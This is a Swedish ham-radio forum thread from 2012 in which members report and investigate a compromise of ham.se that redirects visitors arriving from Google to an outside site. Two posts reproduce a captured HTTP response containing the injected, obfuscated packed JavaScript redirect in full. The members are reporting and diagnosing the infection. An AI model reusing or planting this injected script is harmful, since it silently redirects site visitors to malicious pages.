Ham.se utsatt för hackerattack

SA6BJE

Active Member
Det verkar som skadlig kod tagit sig in på ham.se
Söker jag på artiklar på google och klickar på en länk som pekar på ham.se så kommer jag till http //tinyurl4.info/43e20abf

Detta verkar endast ske via google i samband med firefox. Testat både på jobbet och hemma med samma resultat. Jag får inte problemet med Internet Explorer.

Söker man på tinyurl4.info får man upp andra som haft liknande problem med smittade forum. Det verkar som "viruset" visar sig eller ej beroende bland annat på referer.

Stänger man av javascript i firefox kommer man istället till en vit sida. Tittar man på källkoden så ser man samma script som finns nedan.

Kanske något för Admin att undersöka närmare.

Bifogar en nätverksdump på request och svar.

Code:
GET / HTTP/1.1

Host: [url]www.ham.se[/url]

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:10.0) Gecko/20100101 Firefox/10.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: sv-se,sv;q=0.8,en-us;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

DNT: 1

Connection: keep-alive

Referer: [url]http://www.google.se/url?sa=t&rct=j&q=site%3Aham.se&source=web&cd=1&ved=0CDIQFjAA&url=http%3A%2F%2Fwww.ham.se%2F&ei=ZPFET4_aNsSM4gTQs6G8Aw&usg=AFQjCNG9zaD2H0vfGXXl5huxtGvCM8I8XQ[/url]



HTTP/1.1 200 OK

Date: Wed, 22 Feb 2012 13:45:33 GMT

Server: Apache/2.2.17 (Unix) PHP/5.2.15 mod_ssl/2.2.17 OpenSSL/0.9.7l DAV/2 mod_scgi_pubsub/1.11-pubsub

X-Powered-By: PHP/5.2.15

Set-Cookie: bbsessionhash=082a039b4d99a966595dec4a70ece131; path=/; domain=.ham.se; HttpOnly

Set-Cookie: bblastvisit=1329918333; expires=Thu, 21-Feb-2013 13:45:33 GMT; path=/; domain=.ham.se

Set-Cookie: bblastactivity=0; expires=Thu, 21-Feb-2013 13:45:33 GMT; path=/; domain=.ham.se

Expires: 0

Cache-Control: private, post-check=0, pre-check=0, max-age=0

Pragma: no-cache

X-UA-Compatible: IE=7

MS-Author-Via: DAV

Content-Length: 1099

Keep-Alive: timeout=15, max=500

Connection: Keep-Alive

Content-Type: text/html; charset=ISO-8859-1





var ipbs='43e20abf';eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('m a=["\\A\\d\\b\\l\\c\\z\\d","\\j\\d\\b\\l\\c\\z\\d","\\w\\q\\d\\C\\g\\c\\n\\d\\j\\k","\\b\\e\\D\\B\\l\\J\\b\\n\\c\\i\\A","\\o\\e\\e\\G\\c\\d","\\k","\\w\\q\\g\\v\\b\\u\\k\\f","\\c\\g\\H\\j","\\E","\\r\\e\\o\\v\\b\\c\\e\\i","\\u\\b\\b\\g\\I\\f\\f\\b\\c\\i\\K\\R\\n\\r\\S\\T\\c\\i\\P\\e\\f"];M x(p,y){m h=N O();h[a[1]](h[a[0]]()+L);m s=a[2]+h[a[3]]();t[a[4]]=p+a[5]+y+s+a[6]};x(a[7],a[8]);t[a[9]]=a[F]+Q;',56,56,'||||||||||_0x19e6|x74|x69|x65|x6F|x2F|x70|_0x46a7x4|x6E|x73|x3D|x54|var|x72|x63|_0x46a7x2|x20|x6C|_0x46a7x5|document|x68|x61|x3B|ipbcc|_0x46a7x3|x6D|x67|x4D|x78|x47|x31|10|x6B|x62|x3A|x53|x79|86400000|function|new|Date|x66|ipbs|x75|x34|x2E'.split('|'),0,{}))</script>
 
Last edited:

QRP

Well-Known Member
Det verkar som skadlig kod tagit sig in på ham.se
Söker jag på artiklar på google och klickar på en länk som pekar på ham.se så kommer jag till http //tinyurl4.info/43e20abf

Detta verkar endast ske via google i samband med firefox. Testat både på jobbet och hemma med samma resultat. Jag får inte problemet med Internet Explorer.

Söker man på tinyurl4.info får man upp andra som haft liknande problem med smittade forum. Det verkar som "viruset" visar sig eller ej beroende bland annat på referer.

Stänger man av javascript i firefox kommer man istället till en vit sida. Tittar man på källkoden så ser man samma script som finns nedan.

Kanske något för Admin att undersöka närmare.

Bifogar en nätverksdump på request och svar.

Code:
GET / HTTP/1.1

Host: [url]www.ham.se[/url]

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:10.0) Gecko/20100101 Firefox/10.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: sv-se,sv;q=0.8,en-us;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

DNT: 1

Connection: keep-alive

Referer: [url]http://www.google.se/url?sa=t&rct=j&q=site%3Aham.se&source=web&cd=1&ved=0CDIQFjAA&url=http%3A%2F%2Fwww.ham.se%2F&ei=ZPFET4_aNsSM4gTQs6G8Aw&usg=AFQjCNG9zaD2H0vfGXXl5huxtGvCM8I8XQ[/url]



HTTP/1.1 200 OK

Date: Wed, 22 Feb 2012 13:45:33 GMT

Server: Apache/2.2.17 (Unix) PHP/5.2.15 mod_ssl/2.2.17 OpenSSL/0.9.7l DAV/2 mod_scgi_pubsub/1.11-pubsub

X-Powered-By: PHP/5.2.15

Set-Cookie: bbsessionhash=082a039b4d99a966595dec4a70ece131; path=/; domain=.ham.se; HttpOnly

Set-Cookie: bblastvisit=1329918333; expires=Thu, 21-Feb-2013 13:45:33 GMT; path=/; domain=.ham.se

Set-Cookie: bblastactivity=0; expires=Thu, 21-Feb-2013 13:45:33 GMT; path=/; domain=.ham.se

Expires: 0

Cache-Control: private, post-check=0, pre-check=0, max-age=0

Pragma: no-cache

X-UA-Compatible: IE=7

MS-Author-Via: DAV

Content-Length: 1099

Keep-Alive: timeout=15, max=500

Connection: Keep-Alive

Content-Type: text/html; charset=ISO-8859-1





var ipbs='43e20abf';eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('m a=["\\A\\d\\b\\l\\c\\z\\d","\\j\\d\\b\\l\\c\\z\\d","\\w\\q\\d\\C\\g\\c\\n\\d\\j\\k","\\b\\e\\D\\B\\l\\J\\b\\n\\c\\i\\A","\\o\\e\\e\\G\\c\\d","\\k","\\w\\q\\g\\v\\b\\u\\k\\f","\\c\\g\\H\\j","\\E","\\r\\e\\o\\v\\b\\c\\e\\i","\\u\\b\\b\\g\\I\\f\\f\\b\\c\\i\\K\\R\\n\\r\\S\\T\\c\\i\\P\\e\\f"];M x(p,y){m h=N O();h[a[1]](h[a[0]]()+L);m s=a[2]+h[a[3]]();t[a[4]]=p+a[5]+y+s+a[6]};x(a[7],a[8]);t[a[9]]=a[F]+Q;',56,56,'||||||||||_0x19e6|x74|x69|x65|x6F|x2F|x70|_0x46a7x4|x6E|x73|x3D|x54|var|x72|x63|_0x46a7x2|x20|x6C|_0x46a7x5|document|x68|x61|x3B|ipbcc|_0x46a7x3|x6D|x67|x4D|x78|x47|x31|10|x6B|x62|x3A|x53|x79|86400000|function|new|Date|x66|ipbs|x75|x34|x2E'.split('|'),0,{}))</script>



Kort efter att ha tittat på nämnda sida (länk) råkade jag ut för denna oförklarliga uppdatering:

=================================
Entry Name : InstallShield Uninstall Information
Installation Date : 2012-02-20 21:22:19
Product Name :
Version :
Company :
Description :
Obsolete : No
Uninstall : No
Installation Folder :
Install Source :
Web Site :
Uninstall String :
Installation Change String:
Quiet Uninstall : No
Registry Key : InstallShield Uninstall Information
Installer : Unknown
Root Key : HKEY_LOCAL_MACHINE
System Component : No
=================================

Någon som drabbats av liknande fenomen?
Vad är det för något? Farligt eller ofarligt?
 

SA5BKE

Well-Known Member
Ja, nåt fuffens är det. Jag har vid två tillfällen nu hamnat på någon annan sida och fått frågor om att installera saker. Jag har klickat bort dessa...

Eric
 

QRP

Well-Known Member
Ja, nåt fuffens är det. Jag har vid två tillfällen nu hamnat på någon annan sida och fått frågor om att installera saker. Jag har klickat bort dessa...

Eric

Denna (min) installation gjordes i bakgrunden utan någon möjlighet att påverka förloppet. Skulle gärna vilja veta vad det är för något som har installerats!!
Är det "administratörens" skyldighet att hålla forumen rena på virus och maskar eller faller ansvaret på den enskilda forumläsaren att kolla upp detta?
Jag uppfattar Ham.se som ett seriöst forum och förutsätter då att det är ofarligt och rent från skadlig programkod!
//QRP
 

SM7SEK

Administrator
Staff member
Inte en aning och jag har inte märkt något själv. Jag mailar ägaren så får han ta en titt.
 

Martin Björnström

Well-Known Member
Det verkar som skadlig kod tagit sig in på ham.se
Söker jag på artiklar på google och klickar på en länk som pekar på ham.se så kommer jag till http //tinyurl4.info/43e20abf

Detta verkar endast ske via google i samband med firefox. Testat både på jobbet och hemma med samma resultat. Jag får inte problemet med Internet Explorer.

Söker man på tinyurl4.info får man upp andra som haft liknande problem med smittade forum. Det verkar som "viruset" visar sig eller ej beroende bland annat på referer.

Stänger man av javascript i firefox kommer man istället till en vit sida. Tittar man på källkoden så ser man samma script som finns nedan.

Kanske något för Admin att undersöka närmare.

Hej!

Jag förstår inte riktigt hur du menar. Menar du att scriptet/"viruset" finns på själva ham.se eller på tinyurl4.info? Den sistnämnda sajten vet jag ingenting om.

Kan du tydligt förklara steg-för-steg hur du gör för att nå viruset? Google analyserar vår sajt dagligen (genom Webmaster Tools) och har inte rapporterat något som detta.
 

SA6BJE

Active Member
Jag menar att scriptet finns på ham.se

Starta firefox eller annan browser.
Stäng av javascript.
Gå till google.se
Sök på site:ham.se
Klicka på första länken som går till www.ham.se
Endast en vit sida visas.
Högerklicka och välj view source och javascriptet syns.

Går du direkt till www.ham.se i din browser så kommer inte scriptet upp.

Min gissning är att viruset känner av referer och browser info och väljer när javascriptet skall aktiveras och när man skall se den riktiga sidan.
Att det är svårupptäckt gör ju att risken för upptäckt är mycket mindre vilket i sin tur gör att det får finnas kvar längre.

Kolla när filerna index.php eller motsvarande är senast ändrade.
.htaccess eller liknande kanske också kan vara påverkade.
Det verkar som även t.ex. calendar.php är ändrad om den inte är "virtuell"

Det pekar altså på att viruset kommit in via en bugg i vBulletin.

Däremot verkar t.ex. Vlkommen till SSA:s VHF testresultat inte vara smittad eftersom den är utanför vBulletin.

Fråga mer så hjälper jag gärna till.

//Erik
 

Martin Björnström

Well-Known Member
Vi har nu uppdaterat alla komponenter och rensat cache & datastore. Jag hoppas verkligen att vi fått bort alla problem. Har inte kunnat återskapa problemet.
 

SA5BKE

Well-Known Member
Något är fortfarande skumt. Nu minns jag inte exakt hur det var förra gången, men om jag söker på Google och hittar en träff som leder till ham.se så hamnar jag istället på en skum sida som vill installera saker. Jag tror det var precis så här förra gången också. Tur att jag kör Linux..

Eric
 

SA7BXU

Member
Något liknande har hänt mig ett par gånger de senaste dagarna. Klickade i google på en länk som ledde till ham.se. Kom till en reklamsida. Backade tillbaks till google och tryckte på samma länk igen och kom rätt.
/torbjörn
 

SM4WWO

Well-Known Member
Något liknande har hänt mig ett par gånger de senaste dagarna. Klickade i google på en länk som ledde till ham.se. Kom till en reklamsida. Backade tillbaks till google och tryckte på samma länk igen och kom rätt.
/torbjörn

Har också råkat ut för samma sak. Men det var typ en månad sedan.

Men å andra sidan har jag sedan dess alltid gått in direkt på www.ham.se
 

SM7PXS

Well-Known Member
Hej alla

Jag gjorde en test helt ovetenskapligt. Gick till google nyss och sökte på ham.se. Första länken som kommer upp visas mycket riktigt som ham.se. när man klickar kommer det en hel del popups och andra sidor men inte ham.se. tom svåra att stänga ner genom alt-F4.

Men när jag sedan försökte återskapa felet genom att igen gå till google, söka på ham.se och sedan klicka på samma länk så kommer jag rätt varje gång. Har försökt flera gånger nu. Så felet dyker inte alltid upp. Bara ibland.

Otrevligt är det i vilket fall som helst.

Körde i detta fallet IE9

SM7PXS
Örjan
 
Last edited:

SM0YDO

Well-Known Member
Hej jag har också samma problem när jag ska logga in på Ham.se då provade jag med
att logga in på hembyggen direkt via google men då är det samma problem igen.

Hårddisken i min gamla dator jobbar hela tiden när windows är igång så jag misstänker
att det är virus i den.

mvh Lasse sm0ydo
 

SM7SEK

Administrator
Staff member
Det skumma är ju att man bara blir omdirigerad när man kommer från google. Går jag direkt in på ham.se har det aldrig skett någon omdirigering. Detta oavsett om jag klickar på länken i de mail som kommer om att tråden uppdaterats eller skriver in adressen manuellt alternativt via bokmärke.

Är det någon som blivit omdirigerad när man gått direkt mot adressen www.ham.se?
 
Last edited:

sm5phu

Well-Known Member
Jag kunde se detta med Firefox 11, men efter att jag uppgraderade till Firefox 12 kan jag inte återskapa problemet.

Med Safari 5.1.5 kan jag återskapa problemet.

Kan det ha något att göra med de säkerhetbrister som åtgärdades mellan Firefox 11 och 12?
https://www.mozilla.org/security/known-vulnerabilities/firefox.html

Direkt mot ham.se har jag aldrig blivit omdirigerad.

Edit: Problemet uppträder hos mig med Firefox 12 under Vista men inte under MacOS.

73,
Jonas/SM5PHU
 
Last edited:

SA5BKE

Well-Known Member
ham.se infekterat

Nu har jag sniffat en session och kan konstatera att det är ham.se som är infekterat. Samma problem som förra gången.
 
Top